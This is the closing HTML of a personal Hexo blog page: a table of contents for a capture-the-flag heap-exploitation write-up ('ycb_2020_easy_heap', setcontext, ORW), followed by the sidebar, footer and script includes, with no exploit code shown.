          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E9%A2%98%E7%9A%84orw"><span class="nav-number">1.</span> <span class="nav-text">堆题的orw</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#setcontext"><span class="nav-number">2.</span> <span class="nav-text">setcontext</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ycb-2020-easy-heap"><span class="nav-number">3.</span> <span class="nav-text">ycb_2020_easy_heap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-number">3.1.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#checksec"><span class="nav-number">3.2.</span> <span class="nav-text">checksec</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">3.3.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9E%84%E9%80%A0%E5%A0%86%E9%87%8D%E5%8F%A0"><span class="nav-number">3.4.</span> <span class="nav-text">构造堆重叠</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#gadget-setcontext-orw"><span class="nav-number">3.5.</span> <span class="nav-text">gadget + setcontext + orw</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%AB%E7%9A%84%E6%80%9D%E8%B7%AF"><span class="nav-number">3.6.</span> <span class="nav-text">别的思路</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">64</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">43</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
